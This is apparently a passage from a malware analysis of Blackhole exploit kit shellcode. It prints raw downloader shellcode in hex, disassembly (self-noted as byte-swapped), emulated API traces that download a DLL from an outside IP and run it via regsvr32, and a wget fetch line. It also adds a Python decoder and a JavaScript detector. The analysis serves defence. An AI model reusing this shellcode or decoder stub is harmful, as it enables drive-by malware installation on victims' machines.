- 0000010F EF out dx,eax
- 00000110 2C0C sub al,0xc ; math
- 00000112 5A pop edx
- 00000113 5E pop esi
- 00000114 1A1B sbb bl,[ebx]
- 00000116 6C insb
- 00000117 EF out dx,eax
- 00000118 200C0508085B40 and [eax+0x405b0808],cl
- 0000011F 7B28 jpo 0x149
- 00000121 D028 shr byte [eax],1
- 00000123 287ED7 sub [esi-0x29],bh ; math
- 00000126 A3241BC079 mov [0x79c01b24],eax
- 0000012B E16C loope 0x199
- 0000012D EF out dx,eax
- 0000012E 2835585F5C4A sub [dword 0x4a5c5f58],dh ; math
- 00000134 6C insb
- 00000135 EF out dx,eax
- 00000136 2D354C0644 sub eax,0x44064c35 ; math
- 0000013B 44 inc esp
- 0000013C 6C insb
- 0000013D EE out dx,al
- 0000013E 21357128E9A2 and [dword 0xa2e92871],esi
- 00000144 182C6C sbb [esp+ebp*2],ch
- 00000147 A02C357969 mov al,[0x6979352c]
- 0000014C 284228 sub [edx+0x28],al ; math
- 0000014F 42 inc edx
- 00000150 7F7B jg 0x1cd
- 00000152 28427E sub [edx+0x7e],al ; math
- 00000155 D7 xlatb
- 00000156 AD lodsd
- 00000157 3C5D cmp al,0x5d
- 00000159 E8423E7B28 call dword 0x287b3fa0 ; call
- 0000015E 7ED7 jng 0x137
- 00000160 42 inc edx
- 00000161 2CAB sub al,0xab ; math
- 00000163 2824C3 sub [ebx+eax*8],ah ; math
- 00000166 D7 xlatb
- 00000167 7B2C jpo 0x195
- 00000169 7EEB jng 0x156
- 0000016B AB stosd
- 0000016C C3 ret
- 0000016D 24C3 and al,0xc3
- 0000016F 2A6F3B sub ch,[edi+0x3b] ; math
- 00000172 17 pop ss
- 00000173 A85D test al,0x5d
- 00000175 286FD2 sub [edi-0x2e],ch ; math
- 00000178 17 pop ss
- 00000179 A85D test al,0x5d
- 0000017B 2842EC sub [edx-0x14],al ; math
- 0000017E 42 inc edx
- 0000017F 28D7 sub bh,dl ; math
- 00000181 D6 salc
- 00000182 207EB4 and [esi-0x4c],bh
- 00000185 C0D7D6 rcl bh,0xd6
- 00000188 A6 cmpsb
- 00000189 D7 xlatb
- 0000018A 2666B0C4 es o16 mov al,0xc4
- 0000018E A2D6A12629 mov [0x2926a1d6],al
- 00000193 47 inc edi
- 00000194 1B95A2E23373 sbb edx,[ebp+0x7333e2a2]
- 0000019A 6E outsb
- 0000019B EE out dx,al
- 0000019C 1E push ds
- 0000019D 51 push ecx
- 0000019E 07 pop es
- 0000019F 324058 xor al,[eax+0x58] ; decryption
- 000001A2 5C pop esp
- 000001A3 5C pop esp
- 000001A4 125807 adc bl,[eax+0x7]
- 000001A7 07 pop es
- 000001A8 1E push ds
- 000001A9 1C19 sbb al,0x19
- 000001AB 06 push es
- 000001AC 1D1F1A061C sbb eax,0x1c061a1f
- 000001B1 1A1A sbb bl,[edx]
- 000001B3 06 push es
- 000001B4 1219 adc bl,[ecx]
- 000001B6 1810 sbb [eax],dl
- 000001B8 1810 sbb [eax],dl
- 000001BA 4E dec esi
- 000001BB 07 pop es
- 000001BC 5A pop edx
- 000001BD 47 inc edi
- 000001BE 45 inc ebp
- 000001BF 5D pop ebp
- 000001C0 44 inc esp
- 000001C1 07 pop es
- 000001C2 46 inc esi
- 000001C3 41 inc ecx
- 000001C4 5B pop ebx
- 000001C5 43 inc ebx
- 000001C6 58 pop eax
- 000001C7 07 pop es
- 000001C8 4A dec edx
- 000001C9 5D pop ebp
- 000001CA 41 inc ecx
- 000001CB 44 inc esp
- 000001CC 774B ja 0x219
- 000001CE 4D dec ebp
- 000001CF 5E pop esi
- 000001D0 5B pop ebx
- 000001D1 5A pop edx
- 000001D2 47 inc edi
- 000001D3 41 inc ecx
- 000001D4 06 push es
- 000001D5 46 inc esi
- 000001D6 40 inc eax
- 000001D7 58 pop eax
- 000001D8 17 pop ss
- 000001D9 58 pop eax
- 000001DA 4E dec esi
- 000001DB 5C pop esp
- 000001DC 1B1512184619 sbb edx,[dword 0x19461812]
- 000001E2 1912 sbb [edx],edx
- 000001E4 124141 adc al,[ecx+0x41]
- 000001E7 191B sbb [ebx],ebx
- 000001E9 120E adc cl,[esi]
- 000001EB 1B4D5F sbb ecx,[ebp+0x5f]
- 000001EE 1A15125E4319 sbb dl,[dword 0x19435e12]
- 000001F4 1912 sbb [edx],edx
- 000001F6 12451A adc al,[ebp+0x1a]
- 000001F9 1B1B sbb ebx,[ebx]
- 000001FB 1212 adc dl,[edx]
- 000001FD 1B4319 sbb eax,[ebx+0x19]
- 00000200 1912 sbb [edx],edx
- 00000202 124319 adc al,[ebx+0x19]
- 00000205 1B19 sbb ebx,[ecx]
- 00000207 1212 adc dl,[edx]
- 00000209 42 inc edx
- 0000020A 47 inc edi
- 0000020B 19590E sbb [ecx+0xe],ebx
- 0000020E 19150E434045 sbb [dword 0x4540430e],edx
- 00000214 58 pop eax
- 00000215 155E0E155E adc eax,0x5e150e5e
- 0000021A 285A00 sub [edx+0x0],bl ; math
- 0000021D 28 db 0x28
- // API call trace of the decoded shellcode (emulated):
- 0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
- 0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
- 0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
- 0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://46.175.224.21:8080/forum/links/public_version.php?tf=30:1n:1i:1i:33&we=2v:1k:1m:32:33:1k:1k:31:1j:1o&q=1k&mh=p&vv=r, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
- 0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
- 0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
- 0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
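- // ----------------------------------------------------------------------------
- // Added example (not code from this paste and not the kit's code): the reverse/replace
- // trick, the %u-to-bytes step and the XOR decoder loop above as one Python script.
- // The decoder stub bytes are the real ones from the hexdump; the body wrapped around
- // them is CONSTRUCTED (only the payload URL, not the real 509-byte downloader), the
- // URL is kept defanged (h00p://) like the rest of the paste, and names such as
- // build_sample / parse_decoder / analyze are mine. It also shows the byte-order
- // pitfall: swap=False reproduces what the disasm listing above was fed.
- // ----------------------------------------------------------------------------

```python
"""Added example: decode a BHEK %u shellcode string end to end (not code from the paste).

  1. undo the JS string trick     (the string is stored reversed, with "%u" written "%!")
  2. %uXXXX words -> bytes         (each word is little-endian: %u8366 is the bytes 66 83;
                                    the disassembly listing in the paste was fed the unswapped stream)
  3. parse the decoder stub        (sub cx,-len ; xor byte [eax],KEY ; inc eax ; loop ; call/pop)
  4. XOR-decode the body and carve the download URL
"""
import re
import struct

# Real stub bytes from the hexdump (offsets 0x04..0x0d and 0x16..0x1f); the jmp/call
# displacements only work with this exact layout: 4 sled bytes + 28 stub bytes, data at 0x20.
STUB_HEAD = bytes.fromhex("6683e4fc fc eb10 58 31c9")  # and sp,-4 ; cld ; jmp +0x10 ; pop eax ; xor ecx,ecx
STUB_TAIL = bytes.fromhex("40 e2fa eb05 e8ebffffff")   # inc eax ; loop ; jmp +5 ; call -0x15 (lands on pop eax)
SLED = b"AAAA"                                         # inc ecx x4

# payload URL from the paste (the one the emulated shellcode #1 downloads), kept defanged
SAMPLE_URL = ("h00p://46.175.224.21:8080/forum/links/public_version.php"
              "?tf=30:1n:1i:1i:33&we=2v:1k:1m:32:33:1k:1k:31:1j:1o&q=1k&mh=p&vv=r")


def build_sample(url: str, key: int = 0x28) -> bytes:
    """CONSTRUCTED shellcode: the real stub around a body that holds only the URL.
    The real body is 509 bytes of downloader code ending in the URL; that code is not reproduced."""
    # the real body ends in NULs too; an odd body length keeps the blob even, so it splits into whole %u words
    body = url.encode() + b"\x00" * (3 if len(url) % 2 == 0 else 2)
    neg_len = struct.pack("<H", (-len(body)) & 0xFFFF)   # sub cx, -len  =>  cx = len
    stub = STUB_HEAD + b"\x66\x81\xe9" + neg_len + bytes([0x80, 0x30, key]) + STUB_TAIL
    encoded = bytes(b ^ key for b in body)
    return SLED + stub + encoded + b"\x00"                # one undecoded trailing byte, as in the paste


def to_unicode_escape(sc: bytes) -> str:
    """bytes -> %uXXXX words, little-endian, as the kit's JavaScript carries them"""
    if len(sc) % 2:
        sc += b"\x00"
    return "".join("%%u%04x" % w for (w,) in struct.iter_unpack("<H", sc))


def obfuscate_like_paste(ue: str) -> str:
    """the trick in var a / var b above: "%u" -> "%!", then the whole string is stored reversed"""
    return ue.replace("%u", "%!")[::-1]


def deobfuscate(js_string: str) -> str:
    """what split("").reverse().join("") followed by replace(/%!/g, "%u") does"""
    return js_string[::-1].replace("%!", "%u")


def unicode_escape_to_bytes(ue: str, swap: bool = True) -> bytes:
    """%u4141%u8366 -> b"AA\\x66\\x83" (swap=True).  swap=False gives the byte order the paste's
    disassembly was run on: same hex digits, wrong order, not what executes."""
    words = re.findall(r"%u([0-9a-fA-F]{4})", ue)
    if swap:
        return b"".join(struct.pack("<H", int(w, 16)) for w in words)
    return bytes.fromhex("".join(words))


# 66 81 e9 LL HH  sub cx,imm16 (imm16 = -length) | 80 30 KK  xor byte [eax],KK | 40 e2 fa  inc eax ; loop
DECODER_RE = re.compile(rb"\x66\x81\xe9(..)\x80\x30(.)\x40\xe2\xfa", re.DOTALL)


def parse_decoder(sc: bytes):
    """Return (xor_key, data_offset, length), or None when no such stub is present."""
    m = DECODER_RE.search(sc)
    if m is None:
        return None
    length = (-struct.unpack("<H", m.group(1))[0]) & 0xFFFF
    key = m.group(2)[0]
    call = sc.find(b"\xe8", m.end())   # the call whose return address, popped into eax, is the data start
    if call < 0 or call + 5 + length > len(sc):
        return None
    return key, call + 5, length


def decode_payload(sc: bytes) -> bytes:
    parsed = parse_decoder(sc)
    if parsed is None:
        raise ValueError("no BHEK-style XOR decoder stub found")
    key, off, n = parsed
    return bytes(b ^ key for b in sc[off:off + n])


URL_RE = re.compile(rb"(?:https?|h00p)://[\x21-\x7e]+")   # h00p:// only because the sample is defanged


def carve_url(decoded: bytes) -> str:
    m = URL_RE.search(decoded)
    return m.group(0).decode() if m else ""


def analyze(js_string: str) -> dict:
    """landing-page JS string -> XOR key, carved URL, raw shellcode size"""
    sc = unicode_escape_to_bytes(deobfuscate(js_string))
    parsed = parse_decoder(sc)
    if parsed is None:
        return {"key": None, "url": "", "size": len(sc)}
    return {"key": parsed[0], "url": carve_url(decode_payload(sc)), "size": len(sc)}


if __name__ == "__main__":
    js = obfuscate_like_paste(to_unicode_escape(build_sample(SAMPLE_URL)))
    print(js[:30] + " ...")      # begins "8200!%", exactly like var a / var b above
    print(analyze(js))           # key 0x28 and the SAMPLE_URL carved back out
```

- // On the real strings (var a / var b) the same pipeline returns key 0x28 and the two payload
- // URLs; the only field that changes between the two shellcodes is the encoded URL tail.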
- // shellcode #2: same decoder stub and same downloader code; only the XOR-encoded URL tail differs,
- // and it decodes to the other payload URL (the ...public_version.php?nf=1h:1j:1j:32:1f&je=...&t=1k&oy=p&jh=i one)..
- // raws..
- 414141418366fce4ebfc5810c931816603e980fe2830e240ebfae805ffebffffccad1c5d77c1e81ba34c186868a3a3243458a37e205ef31ba34e14765c2b041bc6a9383dd7d7a39018686eeb2e11d35d1cafad0c5dccc17964c37e795da3a3141d5c2b507edd5ea32b081bdd61e1d4692b851bed27f33896da10205ce3e92b2568f2d9c33713ce5da3760c76f52ba34e63246ea5d7c40c7ca3242bf0a3f5a32ced2b7683eb717bc3a385084055a81b242b5cc3bea3db2040dfa32d42c071d7b0d7d7d1ca28c0282870284278406828d72828ab7831e87d78c4a376a3ab382debcbd74740284640285a5d4544d77cab3e20ecc0a349c0d7d7c3d7c32aa95a2cc42829a5280c74ef240c2c4d5a5b4f6cef2c0c5a5e1a1b6cef200c0508085b407b28d028287ed7a3241bc079e16cef2835585f5c4a6cef2d354c0644446cee21357128e9a2182c6ca02c357969284228427f7b28427ed7ad3c5de8423e7b287ed7422cab2824c3d77b2c7eebabc324c32a6f3b17a85d286fd217a85d2842ec4228d7d6207eb4c0d7d6a6d72666b0c4a2d6a12629471b95a2e233736eee1e51073240585c5c125807071e1c19061d1f1a061c1a1a061219181018104e075a47455d440746415b4358074a5d4144774b4d5e5b5a47410646405817584e5c1b15121846191912124141191b120e1b4d5f1a15125e4319191212451a1b1b12121b431919121243191b191212424719590e19150e43404558155e0e155e285a0028
- // view...
- 41 41 41 41 66 83 e4 fc fc eb 10 58 31 c9 66 81 AAAAf......X1.f.
- e9 03 fe 80 30 28 40 e2 fa eb 05 e8 eb ff ff ff ....0(@.........
- ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3 ..]..w..L.h..h$.
- 58 34 7e a3 5e 20 1b f3 4e a3 76 14 2b 5c 1b 04 X4~.^...N.v.+\..
- a9 c6 3d 38 d7 d7 90 a3 68 18 eb 6e 11 2e 5d d3 ..=8....h..n..].
- af 1c 0c ad cc 5d 79 c1 c3 64 79 7e a3 5d 14 a3 .....]y..dy~.]..
- 5c 1d 50 2b dd 7e a3 5e 08 2b dd 1b e1 61 69 d4 \.P+.~.^.+...ai.
- 85 2b ed 1b f3 27 96 38 10 da 5c 20 e9 e3 25 2b .+...'.8..\...%+
- f2 68 c3 d9 13 37 5d ce 76 a3 76 0c 2b f5 4e a3 .h...7].v.v.+.N.
- 24 63 a5 6e c4 d7 7c 0c 24 a3 f0 2b f5 a3 2c a3 $c.n..|.$..+..,.
- 2b ed 83 76 71 eb c3 7b 85 a3 40 08 a8 55 24 1b +..vq..{..@..U$.
- 5c 2b be c3 db a3 40 20 a3 df 42 2d 71 c0 b0 d7 \+....@...B-q...
- d7 d7 ca d1 c0 28 28 28 28 70 78 42 68 40 d7 28 .....((((pxBh@.(
- 28 28 78 ab e8 31 78 7d a3 c4 a3 76 38 ab eb 2d ((x..1x}...v8..-
- d7 cb 40 47 46 28 28 40 5d 5a 44 45 7c d7 3e ab ..@GF((@]ZDE|.>.
- ec 20 a3 c0 c0 49 d7 d7 d7 c3 2a c3 5a a9 c4 2c .....I....*.Z..,
- 29 28 28 a5 74 0c 24 ef 2c 0c 5a 4d 4f 5b ef 6c )((.t.$.,.ZMO[.l
- 0c 2c 5e 5a 1b 1a ef 6c 0c 20 08 05 5b 08 7b 40 .,^Z...l....[.{@
- d0 28 28 28 d7 7e 24 a3 c0 1b e1 79 ef 6c 35 28 .(((.~$....y.l5(
- 5f 58 4a 5c ef 6c 35 2d 06 4c 44 44 ee 6c 35 21 _XJ\.l5-.LDD.l5!
- 28 71 a2 e9 2c 18 a0 6c 35 2c 69 79 42 28 42 28 (q..,..l5,iyB(B(
- 7b 7f 42 28 d7 7e 3c ad e8 5d 3e 42 28 7b d7 7e {.B(.~<..]>B({.~
- 2c 42 28 ab c3 24 7b d7 7e 2c ab eb 24 c3 2a c3 ,B(..${.~,..$.*.
- 3b 6f a8 17 28 5d d2 6f a8 17 28 5d ec 42 28 42 ;o..(].o..(].B(B
- d6 d7 7e 20 c0 b4 d6 d7 d7 a6 66 26 c4 b0 d6 a2 ..~.......f&....
- 26 a1 47 29 95 1b e2 a2 73 33 ee 6e 51 1e 32 07 &.G)....s3.nQ.2.
- 58 40 5c 5c 58 12 07 07 1c 1e 06 19 1f 1d 06 1a X@\\X...........
- 1a 1c 06 1a 19 12 10 18 10 18 07 4e 47 5a 5d 45 ...........NGZ]E
- 07 44 41 46 43 5b 07 58 5d 4a 44 41 4b 77 5e 4d .DAFC[.X]JDAKw^M
- 5a 5b 41 47 46 06 58 40 58 17 46 4e 15 19 40 12 Z[AGF.X@X.FN..@.
- 19 42 12 19 42 12 1b 1a 12 19 4e 0e 42 4d 15 19 .B..B.....N.BM..
- 42 12 1b 1b 12 1b 1a 12 19 44 12 19 4f 12 19 41 B........D..O..A
- 12 19 47 12 19 46 12 19 47 12 19 41 0e 5c 15 19 ..G..F..G..A.\..
- 43 0e 47 51 15 58 0e 42 40 15 41 28 28 00 C.GQ.X.B@.A((.
- //disasm... (same caveat as for shellcode #1: this listing was run on the un-swapped %u stream)
- 00000000 41 inc ecx
- 00000001 41 inc ecx
- 00000002 41 inc ecx
- 00000003 41 inc ecx
- 00000004 8366FCE4 and dword [esi-0x4],byte -0x1c
- 00000008 EBFC jmp short 0x6 ; loop
- 0000000A 58 pop eax
- 0000000B 10C9 adc cl,cl
- 0000000D 31816603E980 xor [ecx-0x7f16fc9a],eax ; decryption
- 00000013 FE db 0xfe
- 00000014 2830 sub [eax],dh ; math
- 00000016 E240 loop 0x58 ; loop
- 00000018 EBFA jmp short 0x14 ; loop
- 0000001A E805FFEBFF call dword 0xffebff24 ; call
- 0000001F FFCC dec esp
- 00000021 AD lodsd
- 00000022 1C5D sbb al,0x5d
- 00000024 77C1 ja 0xffffffe7
- 00000026 E81BA34C18 call dword 0x184ca346 ; call
- 0000002B 6868A3A324 push dword 0x24a3a368
- 00000030 3458 xor al,0x58 ; decryption
- 00000032 A37E205EF3 mov [0xf35e207e],eax
- 00000037 1BA34E14765C sbb esp,[ebx+0x5c76144e]
- 0000003D 2B041B sub eax,[ebx+ebx] ; math
- 00000040 C6 db 0xc6
- 00000041 A9383DD7D7 test eax,0xd7d73d38
- 00000046 A39018686E mov [0x6e681890],eax
- 0000004B EB2E jmp short 0x7b ; loop
- 0000004D 11D3 adc ebx,edx
- 0000004F 5D pop ebp
- 00000050 1CAF sbb al,0xaf
- 00000052 AD lodsd
- 00000053 0C5D or al,0x5d
- 00000055 CC int3
- 00000056 C17964C3 sar dword [ecx+0x64],0xc3
- 0000005A 7E79 jng 0xd5
- 0000005C 5D pop ebp
- 0000005D A3A3141D5C mov [0x5c1d14a3],eax
- 00000062 2B507E sub edx,[eax+0x7e] ; math
- 00000065 DD5EA3 fstp qword [esi-0x5d]
- 00000068 2B08 sub ecx,[eax] ; math
- 0000006A 1BDD sbb ebx,ebp
- 0000006C 61 popad
- 0000006D E1D4 loope 0x43
- 0000006F 692B851BED27 imul ebp,[ebx],dword 0x27ed1b85
- 00000075 F33896DA10205C rep cmp [esi+0x5c2010da],dl
- 0000007C E3E9 jecxz 0x67
- 0000007E 2B2568F2D9C3 sub esp,[dword 0xc3d9f268] ; math
- 00000084 37 aaa
- 00000085 13CE adc ecx,esi
- 00000087 5D pop ebp
- 00000088 A3760C76F5 mov [0xf5760c76],eax
- 0000008D 2BA34E63246E sub esp,[ebx+0x6e24634e] ; math
- 00000093 A5 movsd
- 00000094 D7 xlatb
- 00000095 C40C7C les ecx,[esp+edi*2]
- 00000098 A3242BF0A3 mov [0xa3f02b24],eax
- 0000009D F5 cmc
- 0000009E A32CED2B76 mov [0x762bed2c],eax
- 000000A3 83EB71 sub ebx,byte +0x71 ; math
- 000000A6 7BC3 jpo 0x6b
- 000000A8 A385084055 mov [0x55400885],eax
- 000000AD A81B test al,0x1b
- 000000AF 242B and al,0x2b
- 000000B1 5C pop esp
- 000000B2 C3 ret
- 000000B3 BEA3DB2040 mov esi,0x4020dba3
- 000000B8 DFA32D42C071 fbld tword [ebx+0x71c0422d]
- 000000BE D7 xlatb
- 000000BF B0D7 mov al,0xd7
- 000000C1 D7 xlatb
- 000000C2 D1CA ror edx,1 ; bitwise cipher
- 000000C4 28C0 sub al,al ; math
- 000000C6 2828 sub [eax],ch ; math
- 000000C8 7028 jo 0xf2
- 000000CA 42 inc edx
- 000000CB 7840 js 0x10d
- 000000CD 6828D72828 push dword 0x2828d728
- 000000D2 AB stosd
- 000000D3 7831 js 0x106
- 000000D5 E87D78C4A3 call dword 0xa3c47957 ; call
- 000000DA 76A3 jna 0x7f
- 000000DC AB stosd
- 000000DD 382DEBCBD747 cmp [dword 0x47d7cbeb],ch
- 000000E3 40 inc eax
- 000000E4 284640 sub [esi+0x40],al ; math
- 000000E7 285A5D sub [edx+0x5d],bl ; math
- 000000EA 45 inc ebp
- 000000EB 44 inc esp
- 000000EC D7 xlatb
- 000000ED 7CAB jl 0x9a
- 000000EF 3E20EC ds and ah,ch
- 000000F2 C0A349C0D7D7C3 shl byte [ebx-0x28283fb7],0xc3
- 000000F9 D7 xlatb
- 000000FA C3 ret
- 000000FB 2AA95A2CC428 sub ch,[ecx+0x28c42c5a] ; math
- 00000101 29A5280C74EF sub [ebp-0x108bf3d8],esp ; math
- 00000107 240C and al,0xc
- 00000109 2C4D sub al,0x4d ; math
- 0000010B 5A pop edx
- 0000010C 5B pop ebx
- 0000010D 4F dec edi
- 0000010E 6C insb
- 0000010F EF out dx,eax
- 00000110 2C0C sub al,0xc ; math
- 00000112 5A pop edx
- 00000113 5E pop esi
- 00000114 1A1B sbb bl,[ebx]
- 00000116 6C insb
- 00000117 EF out dx,eax
- 00000118 200C0508085B40 and [eax+0x405b0808],cl
- 0000011F 7B28 jpo 0x149
- 00000121 D028 shr byte [eax],1
- 00000123 287ED7 sub [esi-0x29],bh ; math
- 00000126 A3241BC079 mov [0x79c01b24],eax
- 0000012B E16C loope 0x199
- 0000012D EF out dx,eax
- 0000012E 2835585F5C4A sub [dword 0x4a5c5f58],dh ; math
- 00000134 6C insb
- 00000135 EF out dx,eax
- 00000136 2D354C0644 sub eax,0x44064c35 ; math
- 0000013B 44 inc esp
- 0000013C 6C insb
- 0000013D EE out dx,al
- 0000013E 21357128E9A2 and [dword 0xa2e92871],esi
- 00000144 182C6C sbb [esp+ebp*2],ch
- 00000147 A02C357969 mov al,[0x6979352c]
- 0000014C 284228 sub [edx+0x28],al ; math
- 0000014F 42 inc edx
- 00000150 7F7B jg 0x1cd
- 00000152 28427E sub [edx+0x7e],al ; math
- 00000155 D7 xlatb
- 00000156 AD lodsd
- 00000157 3C5D cmp al,0x5d
- 00000159 E8423E7B28 call dword 0x287b3fa0 ; call
- 0000015E 7ED7 jng 0x137
- 00000160 42 inc edx
- 00000161 2CAB sub al,0xab ; math
- 00000163 2824C3 sub [ebx+eax*8],ah ; math
- 00000166 D7 xlatb
- 00000167 7B2C jpo 0x195
- 00000169 7EEB jng 0x156
- 0000016B AB stosd
- 0000016C C3 ret
- 0000016D 24C3 and al,0xc3
- 0000016F 2A6F3B sub ch,[edi+0x3b] ; math
- 00000172 17 pop ss
- 00000173 A85D test al,0x5d
- 00000175 286FD2 sub [edi-0x2e],ch ; math
- 00000178 17 pop ss
- 00000179 A85D test al,0x5d
- 0000017B 2842EC sub [edx-0x14],al ; math
- 0000017E 42 inc edx
- 0000017F 28D7 sub bh,dl ; math
- 00000181 D6 salc
- 00000182 207EB4 and [esi-0x4c],bh
- 00000185 C0D7D6 rcl bh,0xd6
- 00000188 A6 cmpsb
- 00000189 D7 xlatb
- 0000018A 2666B0C4 es o16 mov al,0xc4
- 0000018E A2D6A12629 mov [0x2926a1d6],al
- 00000193 47 inc edi
- 00000194 1B95A2E23373 sbb edx,[ebp+0x7333e2a2]
- 0000019A 6E outsb
- 0000019B EE out dx,al
- 0000019C 1E push ds
- 0000019D 51 push ecx
- 0000019E 07 pop es
- 0000019F 324058 xor al,[eax+0x58] ; decryption
- 000001A2 5C pop esp
- 000001A3 5C pop esp
- 000001A4 125807 adc bl,[eax+0x7]
- 000001A7 07 pop es
- 000001A8 1E push ds
- 000001A9 1C19 sbb al,0x19
- 000001AB 06 push es
- 000001AC 1D1F1A061C sbb eax,0x1c061a1f
- 000001B1 1A1A sbb bl,[edx]
- 000001B3 06 push es
- 000001B4 1219 adc bl,[ecx]
- 000001B6 1810 sbb [eax],dl
- 000001B8 1810 sbb [eax],dl
- 000001BA 4E dec esi
- 000001BB 07 pop es
- 000001BC 5A pop edx
- 000001BD 47 inc edi
- 000001BE 45 inc ebp
- 000001BF 5D pop ebp
- 000001C0 44 inc esp
- 000001C1 07 pop es
- 000001C2 46 inc esi
- 000001C3 41 inc ecx
- 000001C4 5B pop ebx
- 000001C5 43 inc ebx
- 000001C6 58 pop eax
- 000001C7 07 pop es
- 000001C8 4A dec edx
- 000001C9 5D pop ebp
- 000001CA 41 inc ecx
- 000001CB 44 inc esp
- 000001CC 774B ja 0x219
- 000001CE 4D dec ebp
- 000001CF 5E pop esi
- 000001D0 5B pop ebx
- 000001D1 5A pop edx
- 000001D2 47 inc edi
- 000001D3 41 inc ecx
- 000001D4 06 push es
- 000001D5 46 inc esi
- 000001D6 40 inc eax
- 000001D7 58 pop eax
- 000001D8 17 pop ss
- 000001D9 58 pop eax
- 000001DA 4E dec esi
- 000001DB 5C pop esp
- 000001DC 1B1512184619 sbb edx,[dword 0x19461812]
- 000001E2 1912 sbb [edx],edx
- 000001E4 124141 adc al,[ecx+0x41]
- 000001E7 191B sbb [ebx],ebx
- 000001E9 120E adc cl,[esi]
- 000001EB 1B4D5F sbb ecx,[ebp+0x5f]
- 000001EE 1A15125E4319 sbb dl,[dword 0x19435e12]
- 000001F4 1912 sbb [edx],edx
- 000001F6 12451A adc al,[ebp+0x1a]
- 000001F9 1B1B sbb ebx,[ebx]
- 000001FB 1212 adc dl,[edx]
- 000001FD 1B4319 sbb eax,[ebx+0x19]
- 00000200 1912 sbb [edx],edx
- 00000202 124319 adc al,[ebx+0x19]
- 00000205 1B19 sbb ebx,[ecx]
- 00000207 1212 adc dl,[edx]
- 00000209 42 inc edx
- 0000020A 47 inc edi
- 0000020B 19590E sbb [ecx+0xe],ebx
- 0000020E 19150E434045 sbb [dword 0x4540430e],edx
- 00000214 58 pop eax
- 00000215 155E0E155E adc eax,0x5e150e5e
- 0000021A 285A00 sub [edx+0x0],bl ; math
- 0000021D 28 db 0x28
- //translating API..
- blocks.... translation...
- 0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
- 0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
- 0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
- 0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://46.175.224.21:8080/forum/links/public_version.php?nf=1h:1j:1j:32:1f&je=1j:33:32:1l:1g:1i:1o:1n:1o:1i&t=1k&oy=p&jh=i, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
- 0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
- 0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
- 0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
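- The drop-and-run sequence in the trace above (URLDownloadToFileA into %TEMP%, then WinExec directly and via regsvr32) is the pattern a sandbox rule should key on; the snippet below is an added example, not from the original paste, that parses lines in the tracer's `0xADDR module.Api(key=value, ...)` form and correlates the dropped path with its later execution. The detection logic is my own; the line format is taken from the trace as shown.

```javascript
// Added example (not part of the paste): flag download-then-execute in an
// API trace formatted like the one above.

// One trace line -> {addr, module, api, args}, or null for non-call lines.
function parseApiLine(line) {
  var m = /^(0x[0-9a-f]+)\s+(\w+)\.(\w+)\((.*)\)\s*$/.exec(line.trim());
  if (!m) return null;
  var args = {};
  m[4].split(/,\s*/).forEach(function (tok) {
    var a = /^(\w+)=(.*)$/.exec(tok);
    if (a) args[a[1]] = a[2];
  });
  return { addr: m[1], module: m[2], api: m[3], args: args };
}

// Correlate URLDownloadToFileA targets with later WinExec command lines.
function findDownloadExec(lines) {
  var dropped = {};   // lower-cased dropped path -> URL it was fetched from
  var findings = [];
  lines.forEach(function (line) {
    var c = parseApiLine(line);
    if (!c) return;
    if (c.api === "URLDownloadToFileA" && c.args.szFileName) {
      dropped[c.args.szFileName.toLowerCase()] = c.args.szURL || "";
    } else if (c.api === "WinExec" && c.args.lpCmdLine) {
      var cmd = c.args.lpCmdLine;
      Object.keys(dropped).forEach(function (path) {
        if (cmd.toLowerCase().indexOf(path) !== -1) {
          findings.push({
            file: path,
            url: dropped[path],
            cmdline: cmd,
            viaRegsvr32: /\bregsvr32\b/i.test(cmd)   // DLL registered, not just run
          });
        }
      });
    }
  });
  return findings;
}

// Sample input: the trace lines from the paste (defanged URL kept as-is).
var TRACE = [
  "0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)",
  "0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)",
  "0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://46.175.224.21:8080/forum/links/public_version.php?nf=1h:1j:1j:32:1f&je=1j:33:32:1l:1g:1i:1o:1n:1o:1i&t=1k&oy=p&jh=i, lpfnCB=0x0, szFileName=C:\\DOCUME~1\\Administrator\\LOCALS~1\\Temp\\wpbt0.dll)",
  "0x7c86250d kernel32.WinExec(lpCmdLine=C:\\DOCUME~1\\Administrator\\LOCALS~1\\Temp\\wpbt0.dll, uCmdShow=0)",
  "0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\\DOCUME~1\\Administrator\\LOCALS~1\\Temp\\wpbt0.dll, uCmdShow=0)",
  "0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)"
];
```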
- //============================
- // PAYLOADS GO FIRST...
- //============================
- // fetch these sh*ts...
- --2013-02-18 15:08:46-- h00p://46.175.224.21:8080/forum/links/public_version.php?tf=30:1n:1i:1i:33&we=2v:1k:1m:32:33:1k:1k:31:1j:1o&q=1k&mh=p&vv=r
